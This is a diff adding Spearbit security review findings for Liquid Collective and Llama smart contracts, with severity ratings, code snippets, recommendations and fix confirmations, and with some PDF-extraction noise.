ERC20VestableVotesUpgradeable.1.sol#L343, ERC20VestableVotesUpgradeable.1.sol#L396-L404, Description/Recommendation: ERC20VestableVotesUpgradeable.1.sol#L343, Might be more accurate to say: - // before lock no tokens can be vested + during the locked period no vested tokens can be released by the beneficiary ERC20VestableVotesUpgradeable.1.sol#L396-L404, missing natspec: @param _index ERC20VestableVotesUpgradeable.1.sol#L441, typo completly should be completely Liquid Collective: Fixed in commit 1470cd. Spearbit: Fixed in commit 1470cd. 9 diff --git a/findings_newupdate/spearbit/LiquidCollectivePR-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/LiquidCollectivePR-Spearbit-Security-Review.txt new file mode 100644 index 0000000..431f2a0 --- /dev/null +++ b/findings_newupdate/spearbit/LiquidCollectivePR-Spearbit-Security-Review.txt @@ -0,0 +1,4 @@ +5.1.1 Calculation of CurrentValidatorExitsDemand and TotalValidatorExitsRequested using unsolicited exits can happen at the end of _setStoppedValidatorCounts(...) Severity: Informational Context: • OperatorsRegistry.1.sol#L541-L546 • OperatorsRegistry.1.sol#L569-L574 Description: Calculation of CurrentValidatorExitsDemand and TotalValidatorExitsRequested using unso- licited exits can happen at the end of _setStoppedValidatorCounts(...) to avoid extra operations like taking minimum per iteration of the loops. Note that: an = an(cid:0)1 (cid:0) min(an(cid:0)1, bn) ) an = a0 (cid:0) min(a0, n X i=1 bn) = max(0, a0 (cid:0) n X i=1 bn) Recommendation: Calculate the sum of all unsolicited exits and then add that to TotalValidatorExitsRe- quested and use the above formula to calculate CurrentValidatorExitsDemand at after the 2 for loops. Liquid Collective: Fixed in 86d45e72e83de8ead43b8b5f85fa583d64599330. Spearbit: Fixed. +5.1.2 Define a new internal function to update TotalValidatorExitsRequested Severity: Informational Context: • OperatorsRegistry.1.sol#L584-L585 • OperatorsRegistry.1.sol#L848-L849 Description/Recommendation: quested and emitting the relevant event by introducing the new internal function: It would be best to refactor the logic of updating TotalValidatorExitsRe- function _setTotalValidatorExitsRequested(uint256 _currentValue, uint256 _newValue) internal { TotalValidatorExitsRequested.set(_newValue); emit SetTotalValidatorExitsRequested(_currentValue, _newValue); } Liquid Collective: Fixed in 18fa86eb117431bb2526d0708a359226fde6678a. Spearbit: Fixed. 4 +5.1.3 use _setCurrentValidatorExitsDemand Severity: Informational Context: • OperatorsRegistry.1.sol#L467 • OperatorsRegistry.1.sol#L589-L592 Description: If an update is needed for CurrentValidatorExitsDemand in _setStoppedValidatorCounts(...), the internal function _setCurrentValidatorExitsDemand is not used. Recommendation: Make sure _setCurrentValidatorExitsDemand is used whenever an update for Current- ValidatorExitsDemand is required Liquid Collective: Fixed in b39846d23642f833246d0d335c4ad2930ecb515e. Spearbit: Fixed. +5.1.4 Changes to the emission of RequestedValidatorExits event during catch-up Severity: Informational Context: • OperatorsRegistry.1.sol#L488 • OperatorsRegistry.1.sol#L546 Description: The event log will be different between the old and new implementations. In the old implementation, the latest RequestedValidatorExits event in the logs will always contain the most up-to-date count of requested exits (count) of an operator after a "catch-up" attempt. This is because a new RequestedValidatorExits event with the up-to-date currentStoppedCount is emitted at the end of the async requestValidatorExits function call. However, in the new implementation, the latest RequestedValidatorExits event in the logs contains the outdated or previous count of an operator after a "catch-up" attempt since a new RequestedValidatorExits event is not emitted at the end of the Oracle reporting transaction. If any off-chain component depends on the latest RequestedValidatorExits event in the logs to determine the count of requested exits (count), it might potentially cause the off-chain component to read and process outdated information. For instance, an operator's off-chain component might be reading the count within the latest Request- edValidatorExits event in the logs and comparing it against its internal counter to decide if more validators need to be exited. The following shows the discrepancy between the events emitted between the old and new implementations. Catch-up implementation in the previous design 1) Catch-up was carried out async when someone called the requestValidatorExits > _pickNextValida- torsToExitFromActiveOperators function 2) Within the _pickNextValidatorsToExitFromActiveOperators function. Assume an operator called opera It will attempt to "catch-up" by and its currentRequestedExits is less than the currentStoppedCount. performing the following actions: 1) Emit UpdatedRequestedValidatorExitsUponStopped(opera, currentRequestedExits, currentStoppedCount) event. 2) Let x be the no. of validator count to "catch-up" (x = currentStoppedCount (cid:0) currentRequestedExits) 3) opera.picked will be incremented by x. Since opera.picked has not been initialized yet, opera.picked = x 3) Assume that the opera is neither the operator with the highest validation count nor the operator with the second highest. As such, opera is not "picked" to exit its validators 5 4) Near the end of the _pickNextValidatorsToExitFromActiveOperators function, it will loop through all op- erators that have operator .picked > 0 and perform some actions. The following actions will be performed against opera since opera.picked > 0: 1) Emit RequestedValidatorExits(opera, currentStoppedCount) event 2) Set opera.requestedExits = currentStoppedCount. 5) After the transaction, two events were emitted for opera to indicate a catch-up had been attempted. • UpdatedRequestedValidatorExitsUponStopped(opera, currentRequestedExits, currentStoppedCount) • RequestedValidatorExits(opera, currentStoppedCount) Catch-up implementation in the new design 1. Catch-up was carried out within the _setStoppedValidatorCounts function during Oracle reporting. 2. Let _stoppedValidatorCounts[idx] be the currentStoppedCount AND operators.requestedExits be currentRequestedExits 3. Assume an operator called opera and its currentRequestedExits is less than the currentStoppedCount. It will attempt to "catch-up" by performing the following actions: 1. Emit UpdatedRequestedValidatorExitsUponStopped(opera, currentRequestedExits, currentStoppedCount) event. 2. Set opera.requestedExits = currentStoppedCount. 4. After the transaction, only one event was emitted for opera to indicate a catch-up had been attempted. • UpdatedRequestedValidatorExitsUponStopped(opera, currentRequestedExits, currentStoppedCount) In addition, as per the comment below, it was understood that unsolicited exits are considered as if exit requests were performed for them. In this case, the latest RequestedValidatorExits event in the logs should reflect the most up-to-date count of exit requests for an operator including unsolicited exits at any time. File: OperatorsRegistry.1.sol 573: ,! 574: ,! were performed for them vars.currentValidatorExitsDemand); // we decrease the demand, considering unsollicited exits as if the exit requests vars.currentValidatorExitsDemand -= LibUint256.min(unsollicitedExits, Recommendation: Consider updating the implementation to ensure that the latest RequestedValidatorExits event in the logs contains the most up-to-date count of exit requests for an operator including unsolicited exits at any time. Liquid Collective: We indeed considered that emitting RequestedValidatorExits on catch-up could confuse Node Operators because we are not requesting them to exit. So what we can consider is • RequestedValidatorExits is always emitted to signal a NO to perform the action to exit 1 or more validator key. • UpdatedRequestedValidatorExitsUponStopped is emitted so indexers/off-chain system can update requested values but does not signal NOs. Spearbit: Acknowledged. 6 diff --git a/findings_newupdate/spearbit/Llama-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Llama-Spearbit-Security-Review.txt new file mode 100644 index 0000000..7e063fa --- /dev/null +++ b/findings_newupdate/spearbit/Llama-Spearbit-Security-Review.txt @@ -0,0 +1,43 @@ +5.1.1 The castApprovalBySig and castDisapprovalBySig functions can revert Severity: Critical Risk Context: LlamaCore.sol#L683-L685 Description: The castApprovalBySig and castDisapprovalBySig functions are used to cast an approve or disapprove via an off-chain signature. Within the _preCastAssertions a check is performed against the strategy using msg.sender instead of policy- holder, the strategy (e.g. AbsoluteStrategy) uses that argument to check if the cast sender is a policyholder. isApproval ? actionInfo.strategy.isApprovalEnabled(actionInfo, msg.sender) : actionInfo.strategy.isDisapprovalEnabled(actionInfo, msg.sender); While this works for normal cast, using the ones with signatures will fail as the sender can be anyone who calls the method with the signature signed off-chain. Recommendation: Consider sending the policyholder instead of msg.sender Llama: Fixed in commit 4bb184 and PR 285. Spearbit: Resolved. +5.1.2 The castApproval/castDisapproval doesn't check if role parameter is the approvalRole Severity: Critical Risk Context: LlamaCore.sol#L642 Description: A policyholder should be able to cast their approval for an action if they have the approvalRole defined in the strategy. It should not be possible for other roles to cast an action. The _castApproval method verifies if the policyholder has the role passed as an argument but doesn't check if it actually has approvalRole which is eligible to cast an approval. This means any role in the llama contract can participate in the approval with completely different quantities (weights). The same problem occurs for the castDisapproval function as well. Recommendation: The check could be added inside the strategy in the getApprovalQuantityAt function: Rela- tiveStrategy.sol#L174 function getApprovalQuantityAt(address policyholder, uint8 role, uint256 timestamp) external view ,! returns (uint128) { if (role != approvalRole) return 0; uint128 quantity = policy.getPastQuantity(policyholder, role, timestamp); return quantity > 0 && forceApprovalRole[role] ? type(uint128).max : quantity; + } If the passed role doesn't equal the approvalRole a quantity of zero could be returned. if (role != approvalRole) return 0; Llama: Fixed in commit 38b5a9. Spearbit: Resolved. 5 5.2 High Risk +5.2.1 Reducing the quantity of a policyholder results in an increase instead of a decrease in totalQuan- tity Severity: High Risk Context: LlamaPolicy.sol#L388 Description: In Llama policyholder can approve or disapprove actions. Each policyholder has a quantity which represents their approval casting power. It is possible to update the quantity of individual policyholder with the setRoleHolder function in the LlamaPolicy. The _setRoleHolder method is not handling the decrease of quantity correctly for the totalQuantity. The totalQuantity describes the sum of the quantities of the individual policyholders for a specific role. In the case of a quantity change, the difference is calculated as follows: uint128 quantityDiff = initialQuantity > quantity ? initialQuantity - quantity : quantity - ,! initialQuantity; However, the quantityDiff is always added instead of being subtracted when the quantity is reduced. This results in an incorrect tracking of the totalQuantity. Adding the quantityDiff should only happen in the increase case. See: LlamaPolicy.sol#L388 // case: willHaveRole=true, hadRoleQuantity=true newTotalQuantity = currentRoleSupply.totalQuantity + quantityDiff; Recommendation: The increase and decrease case of quantity should be handled in separate if-conditions or using an int variable for calculating the difference. Decrease: if(hadRoleQuantity && willHaveRole && initialQuantity > quantity) { newTotalQuantity = currentRoleSupply.totalQuantity - quantityDiff; } Increase: if(hadRoleQuantity && willHaveRole && initialQuantity < quantity) { newTotalQuantity = currentRoleSupply.totalQuantity + quantityDiff; } Llama: Resolved by commit eb90d2 and PR 291. Spearbit: Resolved. 6 5.3 Medium Risk +5.3.1 LlamaPolicy.revokePolicy cannot be called repeatedly and may result in burned tokens retaining active roles Severity: Medium Risk Context: LlamaPolicy.sol#L199) Description: Llama has two distinct revokePolicy functions. The first revokePolicy function removes all roles of a policyholder and burns the associated token. This function iterates over all existing roles, regardless of whether a policyholder still holds the role. In the next step the token is burned. If the total number of roles becomes too high, this transaction might not fit into one block. A second version of the revokePolicy function allows users to pass an array of roles to be removed. This approach should enable the function to be called multiple times, thus avoiding an "out-of-gas" error. An out-of-gas error is currently not very likely considering the maximum possible role number of 255. However, the method exists and could be called with a subset of the roles a policyholder. The method contains the following check: if (balanceOf(policyholder) == 0) revert AddressDoesNotHoldPolicy(policyholder); Therefore, it is not possible to call the method multiple times. The result of a call with a subset of roles would lead to an inconsistent state. The token of the policyholder is burned, but the policyholder could still use the remaining roles in Llama. Important methods like LlamaPolicy.hasRole don't check if LlamaPolicy.sol#L250) the token has been burned. (See Recommendation: Add a separate method revokePolicyWithoutBurn which only revokes the roles. This method can be provided as part of llama script. The script could check the numRoles and splits the call into multiple revokePolicyWithoutBurn ensuring each role will be revoked. In the last call the token should be burned. Llama: Resolved by commit ad0391 and PR 294. Spearbit: Resolved. +5.3.2 Role, permission, strategy, and guard management or config errors may prevent creating/approving/queuing/executing actions Severity: Medium Risk Context: Creating • LlamaCore.sol#L492 • LlamaCore.sol#L583 Policyholder check • LlamaCore.sol#L589 Strategy validateActionCreation • LlamaCore.sol#L592 Guard check Approving • LlamaCore.sol#L492 • LlamaCore.sol#L544-L552 getActionState's calls to the strategy • LlamaCore.sol#L680 Policyholder check Queuing • LlamaCore.sol#L492 7 • LlamaCore.sol#L544-L552 getActionState's calls to the strategy • LlamaCore.sol#L283 Getting minExecutionTime for queuing Executing • LlamaCore.sol#L492 • LlamaCore.sol#L544-L552 getActionState's calls to the strategy • LlamaCore.sol#L303 Pre-execution guard • LlamaCore.sol#L346 Post-execution guard Description: LlamaCore deployment from the factory will only succeed if one of the roles is the BOOTSTRAP_ROLE. As the comments note: // There must be at least one role holder with role ID of 1, since that role ID is initially // given permission to call `setRolePermission`. This is required to reduce the chance that an // instance is deployed with an invalid configuration that results in the instance being unusable. // Role ID 1 is referred to as the bootstrap role. There are still several ways a user can misstep and lose access to LlamaCore. • Bootstrap Role Scenarios While the bootstrap role is still needed: 1. Setting an expiry on the bootstrap role's policyholder RoleHolderData and allowing the timestamp to pass. Once passed any caller may remove the BOOTSTRAP_ROLE from expired policyholders. 2. Removing the BOOTSTRAP_ROLE from all policyholders. 3. Revoking the role's permission with setRolePermission(BOOTSTRAP_ROLE, bootstrapPermissionId, false). • General Roles and Permissions Similarly, users may allow other permissions to expire, or remove/revoke them, which can leave the contract in a state where no permissions exist to interact with it. The BOOTSTRAP_- ROLE would need to be revoked or otherwise out of use for this to be a problem. • Misconfigured Strategies A misconfigured strategy may also result in the inability to process new actions. For example: 1. Setting minApprovals too high. 2. Setting queuingPeriod unreasonably high 3. Calling revokePolicy when doing so would make policy.getRoleSupplyAsQuantitySum(approvalRole) fall below minApprovals (or fall below minApprovals - actionCreatorApprovalRoleQty). 1 & 2 but applied to disapprovals. And more, depending on the strategy (e.g. if a strategy always responded true to isActive). • Removal of Strategies It should not be possible to remove the last strategy of a Llama instance It is possible to remove all strategies from an Ilama instance. It would not be possible to create a new action afterward. An action is required to add other strategies back. As a result, the instance would become unusable, and access to funds locked in the Accounts would be lost. • Misconfigured Guards An accidentally overly aggressive guard could block all transactions. There is a built-in protection to prevent guards from getting in the way of basic management if (target == address(this) || target == address(policy)) revert CannotUseCoreOrPolicy();. Again, the BOOTSTRAP_ROLE would need to be revoked or otherwise out of use for this to be a problem. Recommendation: • Bootstrap Role Given the importance of the bootstrap role, and the factory-level enforcement of its exis- tence, preventing it from expiring would prevent accidental loss of the role. 8 In general, exercise extreme caution when removing or disabling this role. • General Roles and Permissions In addition to any potential code changes, documentation and UI should highlight the foot guns present when removing role permissions and roles from policyholders (i.e. care must be taken to ensure the remaining permissions/roles support the ongoing operation of LlamaCore). • Misconfigured Strategies Again, document and surface risks in UI at a minimum. Consider adding on-chain checks if ever possible to prevent strategies that are unable to create/approve/execute actions. • Removal of Strategies It should not be possible to remove the last strategy of a Llama instance Risk of removing strategies should be documented and surfaced in the UI, as even if one strategy remains, it may not be the strategy needed to support the remaining permissions. • Misconfigured Guards Similar to strategies, document and surface risks in UI at minimum. Consider adding on-chain checks if ever possible to prevent guards that are unable to create/approve/execute actions. Llama: We made all possible changes to accommodate these findings, not everything can be solved onchain but we will have offchain infrastructure to help prevent these situations. The changes that were performed: 1. Expect the bootstrap role to be at index 0 2. Require that it's expiration is type(uint64).max Spearbit: Acknowledged. +5.3.3 LlamaPolicy.hasRole doesn't check if a policyholder holds a token Severity: Medium Risk Context: LlamaPolicy.sol#L250 Description: Incorrect usage of the revokePolicy function can result in a case, where the token of a policyholder is already burned but still holds a role. The hasRole function doesn't check if in addition to the role the policyholder still holds the token to be active. The role could still be used in the Llama system. Recommendation: Add if (balanceOf(policyholder) == 0) return false to the hasRole function. Llama: Resolved by commit ad0391 and PR 294. Spearbit: Resolved. +5.3.4 Incorrect isActionApproved behavior if new policyholders get added after the createAction in the same block.timestamp Severity: Medium Risk Context: RelativeStrategy#L162 Description: Llama utilizes Checkpoints to store approval quantities per timestamp. If the current quantity changes, the previous values are preserved. The block.timestamp of createAction is used as a snapshot for the approval. (See: LlamaCore.sol#L597) Thus, in addition to the Checkpoints, the totalQuantity or numberOfHolders at the createAction are included in the snapshot. However, if new policyholders are added or their quantities change after the createAction within the same block.timestamp, they are not considered in the snapshot but remain eligible to cast an approval. For example, if there are four policyholders together 50% minimum approval: If a new action is created and two policyholders are added subsequently within the same block.timestamp. 9 The numberOfHolders would be 4 in the snapshot instead of 6. All 6 policyholders could participate in the approval, and two approvals would be sufficient instead of 4. Adding new policyholders together with creating a new action could happen easily in a llama script, which allows to bundle different actions. If a separate action is used to add a new policyholder, the final execution happens via a public callable function. An attacker could exploit this by trying to execute the add new policyholder action if a new action is created Recommendation: The correctness of the approval casting mechanism should not be impacted by other actions. A simple solution could be to store for each role the timestamp of lastActionCreated. The setRoleHolder function should revert in case lastActionCreated == block.timestamp. It would still be possible to add new policyholders and create an action in the same Llama script. However, it would ensure that policyholders are always added before the create action. Llama: Resolved by commit 337672 and commit bee182. Spearbit: Resolved. +5.3.5 LlamaCore delegate calls can bring Llama into an unusable state Severity: Medium Risk Context: LlamaCore.sol#L337 Description: The core contract in Llama allows the execution of actions through a delegate_call. An action is executed as a delegate_call when the target is added as an authorizedScript. This enables batching multiple tasks into a contract, which can be executed as a single action. In the delegate_call, a script contract could modify arbitrary any slot of the core contract. The Llama team is aware of this fact and has added additional safety-checks to see if the slot0 has been modified by the delegate_call. The slot0 contains values that should never be allowed to change. bytes32 originalStorage = _readSlot0(); (success, result) = actionInfo.target.delegatecall(actionInfo.data); if (originalStorage != _readSlot0()) revert Slot0Changed(); A script might be intended to modify certain storage slots. However, incorrect SSTORE operations can completely break the contracts. For example, setting actionsCount = type(uint).max would prevent creating any new actions, and access to funds stored in the Account would be lost. Recommendation: Users should be aware of the risks associated with using the delegate_call in the LlamaCore contract. We acknowledge the benefits of using a delegate_call in certain situations. The risks of errors or malicious code in scripts must be clearly documented. SSTORE operations in scripts should be reviewed carefully. To further mitigate these risks, the LlamaCore contract could be separated into two individual contracts. For not allowing certain variables to be changed at all. Llama: Resolved by adding LlamaExecutor in commit d0ba59 and PR 298. Spearbit: Resolved. 10 +5.3.6 The execution opcode of an action can be changed from call to delegate_call after approval Severity: Medium Risk Context: LlamaCore.sol#L309 Description: In Llama an action only defines the target address and the function which should be called. An action doesn't implicitly define if the opcode should be a call or a delegate_call. This only depends on whether the target address is added to authorizedScripts mapping. However, adding a target to the authorizedScripts can be done after the approval in a different action. The authorizedScript action could use a different set of signers with a different approval strategy. The change of adding a target to authorizedScript should not impact actions which are already approved and in the queuing state. This could lead to security issues when policyholders approved the action under the assumption the opcode will be a call instead of a delegate call. Recommendation: If policyholders approve or disapprove of an action, the execution opcode should already be defined. It should not be possible for other actions with different signers to indirectly change it without explicitly modifying the current action. Llama: Resolved by commit e2c9ed. Spearbit: Resolved. 5.4 Low Risk +5.4.1 LlamaFactory is governed by Llama itself Severity: Low Risk Context: LlamaFactory.sol#L159 Description: Llama uses their own governance system to govern the LlamaFactory contract. The LlamaFactory contract is responsible for authorizing new LlamaStrategies. We can identify several potential drawbacks with this approach. If only a single strategy contract is used and a critical bug is discovered, the implications could be significant. In such a scenario, it would mean a broken strategy contract needs to be used by the Factory governance to deploy a fixed version of the strategy contract or enable other strategies. The likelihood for this to happen is still low but implications could be critical. Recommendation: Analyze the likelihood of such a scenario. One idea could be to decouple the Factory gover- nance from Llama. This could be achieved by making the Factory Ownable which could be optional set to Llama governance. This would allow us to use for example gnosis safe in the beginning and later on, migrate as indented to Llama Governance. Llama: We are confident in the Llama governance system to govern the Llama Factory. Spearbit: Acknowledged. 11 +5.4.2 The permissionId doesn't include call or delegate-call for LlamaAccount.execute Severity: Low Risk Context: LlamaAccount.sol#L236) Description: The decision if LlamaAccount.execute is a delegate_call depends on the bool flag parameter withDelegatecall. This parameter is not included in the permissionId, which controls role permissions in Llama. The permissionId in Llama is calculated in the following way: PermissionData memory permission = PermissionData(target, bytes4(data), strategy); bytes32 permissionId = keccak256(abi.encode(permission)); The permissionId required for a role to perform an action only includes the function signature but not the param- eters themselves. It is impossible to define the opcode as part of the permissionId. Recommendation: LlamaAcccount.execute into two separate functions. Include the opcode for the execution as part of permissionId or split the Another alternative idea could be to use Llama guards for Accounts to verify to opcode. Llama: In practice accounts will likely require more granular control than solely separating the permissions of a call vs. delegatecall from the account. Even an arbitrary call is sufficient to drain an account, so including call vs delegatecall in permission ID doesn't buy you much security. What's more likely is that each Account will have its own guard, and that guard can have its own permission system with any desired characteristics. Spearbit: Acknowledged. +5.4.3 Nonconforming EIP-712 typehash Severity: Low Risk Context: LlamaCore.sol#L97, LlamaCore.sol#L102 Description: Incorrect strings used in computing the EIP-712 typehash. 1. The strings contain space( ) after comma(,) which is not standard EIP-712 behaviour. 2. ActionInfo is not used in typehash. There will be a mismatch when comparing to hashes produced by JS libs or solidity (if implemented), etc.. Not adhering to EIP-712 spec means wallets will not render correctly and any supporting tools will produce a different typehash. Recommendation: Remove spaces( ) after commas(,) and append the ActionInfo struct. Llama: Resolved in commit fbc9b4. Spearbit: Resolved. 12 +5.4.4 Various events do not add the role as parameter Severity: Low Risk Context: LlamaCore.sol#L52-L77 Description: Note: During the audit, the client discovered an issue that affects their offchain infrastructure. Various events do not emit the role as parameter: 1. event ActionCreated(uint256 id, address indexed creator, ILlamaStrategy indexed strategy, address indexed target, uint256 value, bytes data, string description); 2. event ApprovalCast(uint256 id, address indexed policyholder, uint256 quantity, string reason); 3. event DisapprovalCast(uint256 id, address indexed policyholder, uint256 quantity, string reason); Recommendation: Consider adding the role as a parameter to the aforementioned events. Llama: Fixed in commit 34e493 and PR 305. Spearbit: Resolved. +5.4.5 LlamaCore doesn't check if minExecutionTime returned by strategy is in the past Severity: Low Risk Context: LlamaCore.sol#L283 Description: The minExecutionTime returned by a strategy is not validated. Recommendation: An additional require(minExecutionTime >= block.timestamp) safety check could ensure more protection. The Llama strategies could be seen as a bit outside of the system and a lot of new strategies could be added. An additional check would ensure the correct behavior of strategies. Llama: Resolved by commit 312337 and PR 292. Spearbit: Resolved. +5.4.6 Address parsing from tokenId to address string does not account for leading 0s Severity: Low Risk Context: LlamaPolicyMetadata.sol#L37, LlamaPolicyMetadata.sol#L27 Description: Policy tokenIds are derived from the holder's account address. The address is intended to be displayed in the svg generated when calling tokenURI. Currently, leading 0s are truncated rendering the incorrect address string: e.g. 0x015b... vs 0x0000...be60 for address 0x0000000000015B23C7e20b0eA5eBd84c39dCbE60. Recommendation: Instead of converting the tokenId from uint256 to a hex string, first cast it to an address and make use of the address to hex string function from LibString: - string memory policyholder = LibString.toHexString(tokenId); + string memory policyholder = LibString.toHexString(address(uint160(tokenId))); Llama: Resolved by commit 0e5654 and PR 295 Spearbit: Resolved. 13 +5.4.7 The ALL_HOLDERS_ROLE can be set as a force role by mistake Severity: Low Risk Context: RelativeStrategy.sol#L141-L145, AbsoluteStrategy.sol#L130-L142 Description: During the initialization, an array of roles that must be assigned as force approval/disapproval can be sent. The logic does not account for ALL_HOLDERS_ROLE (which is role id 0, the default value of uint8) which can be sent as a mistake by the user. This is a low issue as if the above scenario happens, the strategy can become obsolete which will render the owner redeploy the strategy with correct initialization configs. We must mention that the force roles can not be changed after they are set within the initialization. Recommendation: Consider making an explicit logic for the owner to set ALL_HOLDERS_ROLE (e.g. an array with one role, ALL_HOLDERS_ROLE, must be sent for this functionality to be permitted, otherwise revert in case the array contains a 0) Llama: The ability to set ALL_HOLDERS_ROLE as a force (dis)approval role has been prevented in commit f2cad6 and PR 303. Spearbit: Resolved. +5.4.8 LlamaPolicy.setRolePermission allows to set permissions for non existing roles Severity: Low Risk Context: LlamaPolicy.sol#L396 Description: It is possible to set a permission for a role that doesn't exist, yet. In other functions like assigning a role to a policyholder, this check happens. (See: LlamaPolicy.sol#L343) A related issue, very close to this, is the updateRoleDescription method which can emit an event for a role that does not exists. This is just an informational issue as it does not affect with anything the on-chain logic, might affect off-chain logic if any logic will ever rely on it. Recommendation: Add the following check to the function if (role > numRoles) revert RoleNotInitialized(role); Llama: Resolved by commit 998d14 and PR 299. Spearbit: Resolved. +5.4.9 The RoleAssigned event in LlamaPolicy emits the currentRoleSupply instead of the quantity Severity: Low Risk Context: LlamaPolicy.sol#L393 Description: During the audit, the client discovered an issue that affects their off-chain infrastructure. The RoleAssigned event in LlamaPolicy emits the currentRoleSupply instead of the quantity. From an off-chain perspective, there is currently no way to get the quantity assigned for a role to a policyholder at Role Assignment time. The event would be more useful if it emitted quantity instead of currentRoleSupply (since the latter can be just be calculated off-chain from the former). Recommendation: Change emit RoleAssigned(policyholder, role, expiration, currentRoleSupply); to emit RoleAssigned(policyholder, role, expiration, quantity); Llama: Fixed in commit de7168 and PR 288. Spearbit: Resolved. 14 +5.4.10 ETH can remain in the contract if msg.value is greater than expected Severity: Low Risk Context: LlamaCore.sol#L297 Description: When an action is created, the creator can specify an amount of ETH that needs to be sent when executing the transaction. This is necessary in order to forward ETH to a target call. Currently, when executing the action the msg.value is checked to be at least the required amount of ETH needed to be forwarded. if (msg.value < actionInfo.value) revert InsufficientMsgValue(); This can result in ETH remaining in the contract after the execution. From our point of view, LlamaCore should not hold any balance of ETH. Recommendation: Consider changing the require to an equal or forwarding the whole msg.value to the target. Llama: Fixed in commit 23d376. Spearbit: Resolved. +5.4.11 Cannot re-authorize an unauthorized strategy config Severity: Low Risk Context: LlamaCore.sol#L492 and LlamaCore.sol#L709-L710 Description: Strategies are deployed using a create2 salt. The salt is derived from the strategy config itself (see LlamaCore.sol#L709-L710). This means that any unauthorized strategy cannot be used in the future, even if a user decides to re-enable it. Recommendation: Consider if this is desired behavior. If not, allow re-authorization OR skip the create2 deploy- ment attempt if the strategy address exists already. Llama: Resolved by commit fa7bbf and PR 300. We ended up removing the unauthorizeStrategies method and the concept of authorizing strategies and went with implicit unauthorization by unassigning all permission IDs using a given strategy Spearbit: Resolved. +5.4.12 Signed messages may not be cancelled Severity: Low Risk Context: LlamaCore.sol#L143 Description: Creating, approving, and disapproving actions may all be done by signing a message and having another account call the relevant *BySig function. Currently, there is no way for a signed message to be revoked without a successful *BySig function call containing the nonce of the message to be revoked. Recommendation: Provide a means of incrementing nonces to allow signers to revoke a signed message. Llama: Resolved by commit c7b948 and PR 315. Spearbit: Resolved. 15 +5.4.13 LlamaCore name open to squatting or impersonation Severity: Low Risk Context: LlamaFactory.sol#L137 Description: When deploying a LlamaCore clone, the create2 salt is derived from the name. This means that no two may have the same name, and name squatting, or impersonation, may occur. Recommendation: May be handled in the UI by being selective in what names are displayed. Alternatively, a combination of name and salt could be used to form the create2 salt. This would still leave imper- sonation open but would prevent squatting as duplicate names would be allowed. Finally, in discussion with the Llama team, a mitigation using msg.sender plus name to create the create2 salt would prevent squatting by allowing duplicate names and tying addresses to the deployer account. Llama: Since the deploy function is governed by Llama, we feel comfortable that we'll have the proper safeguards to prevent this issue. Spearbit: Acknowledged. +5.4.14 Expired policyholders are active until they are explicitly revoked Severity: Low Risk Context: LlamaPolicy.sol#L180 Description: Each policyholder in Llama has an expiration timestamp. However, policyholder can still use the power of their role after the expiration has passed. The final revoke only happens after the public LlamaPolicy.revokeExpiredRole method is called. Anyone can call this method after the expiration timestamp is passed. For the Llama system to function effectively with role expiration, it is essential that external keepers vigilantly monitor the contract and promptly revoke expired roles. A final revoke exactly at the expiration can not be guaranteed. Recommendation: Consider if this is the desired behavior, if not consider taking into account the expiration behavior of a role. Llama: We acknowledge this issue as it's a trade-off we are ok with. The definition of a valid role is • Role had quantity at action creation. • Role may be revokable at action creation, but if not yet revoked, it's still active. Spearbit: Acknowledged. 16 5.5 Gas Optimization +5.5.1 Gas optimizations Severity: Gas Optimization Context: General Description: Throughout the codebase we've identified gas improvements that were aggregated into one issue for a better management. RelativeStrategy.sol#L159 • The if (disapprovalPolicySupply == 0) revert RoleHasZeroSupply(disapprovalRole); check and actionDisapprovalSupply[actionInfo.id] = disapprovalPolicySupply; can be wrapped in an if block in case disapprovals are enabled • The uint128 newNumberOfHolders; and uint128 newTotalQuantity; variables are obsolete as the up- dates on the currentRoleSupply can be done in the if branches. LlamaPolicy.sol#L380-L392 • The exists check is redundant LlamaPolicy.sol#L252 • The _validateActionInfoHash(action.infoHash, actionInfo); is redundant as it's already done in the getActionState LlamaCore.sol#L292 LlamaCore.sol#L280 LlamaCore.sol#L672 • Finding the BOOTSTRAP_ROLE in the LlamaFactory._deploy could happen by expecting the role at a cer- tain position like position 0 instead of paying gas for an on-chain search operation to iterate the array. LlamaFactory.sol#L205 • quantityDiff calculation guaranteed to not overflow as the ternary checks initialQuantity > quantity before subtracting. • Infeasible for numberOfHolders and totalQuantity to overflow. See also LlamaPolicy.sol#L422-L423 • Infeasible for numberOfHolders to overflow. Recommendation: Consider implementing the gas optimizations. • approvalRole can be read from memory instead of reloading from storage. Llama: Resolved in PR 284 and commit c0303c. We decided to acknowledge the first issue as it would add too much complexity to the code. Spearbit: Resolved. +5.5.2 Unused code Severity: Gas Optimization Context: Description: Various parts of the code is unused or unnecessary. • CallReverted and MissingAdmin in LlamaPolicy.sol#L27-L29 • DisapprovalThresholdNotMet in RelativeStrategy.sol#L28 • Unused errors in LlamaCore.sol InvalidCancelation, ProhibitedByActionGuard, ProhibitedByStrategy, ProhibitedByStrategy(bytes32 reason) and RoleHasZeroSupply(uint8 role) • /// - Action creators are not allowed to cast approvals or disapprovals on their own actions, The comment is inaccurate, this strategy, the creators have no restrictions on their actions. RelativeStrategy.sol#L19 17 Recommendation: Consider removing the unnecessary code blocks. Llama: Resolved in PR 227 and commit 5071e5. diff. Spearbit: Resolved. +5.5.3 Duplicate storage reads and external calls Severity: Gas Optimization Context: castApproval sequence diagram, createAction sequence diagram Description: When creating, approving, disapproving, queuing, and executing actions, there are calls between the various contracts in the system. Due to the external calls, the compiler will not cache storage reads, meaning the gas cost of warm sloads is incurred multiple times. The same is true for view function calls between the contracts. A number of these calls are returning the same value multiple times in a transaction. Recommendation: Consider where simple changes can be made to cache reads or avoid duplicate calls. Where entirely eliminating duplicate reads, we agree that there is a trade-off, and saving 100 gas for a warm read may not be worth added complexity for some areas. Llama: We addressed some of these findings in commit e5d5ee, but in some cases we decided to optimize for readability over optimization. Spearbit: Acknowledged. +5.5.4 Consider clones-with-immutable-args Severity: Gas Optimization Context: LlamaCore.sol#L108-L117, and elsewhere. Description: The cloned contracts have immutable values that are written to storage on initialization due to proxies being used. Reading from storage costs extra gas but also puts some of the storage values at risk of being overwritten when making delegate calls. Recommendation: Consider if clones-with-immutable-args is appropriate for the project. Llama: We chose not to use one of the clones-with-immutable-args implementations because: 1. The contracts are not audited (they have been involved with audits but never directly audited themselves) 2. Infrequent governance actions are typically less gas-sensitive than e.g. critical path DeFi methods called by every user, which we think makes this change not worth the risk due to (1) Spearbit: Acknowledged. The remaining delegate call risks are discussed in another ticket. +5.5.5 The domainSeperator may be cached Severity: Gas Optimization Context: 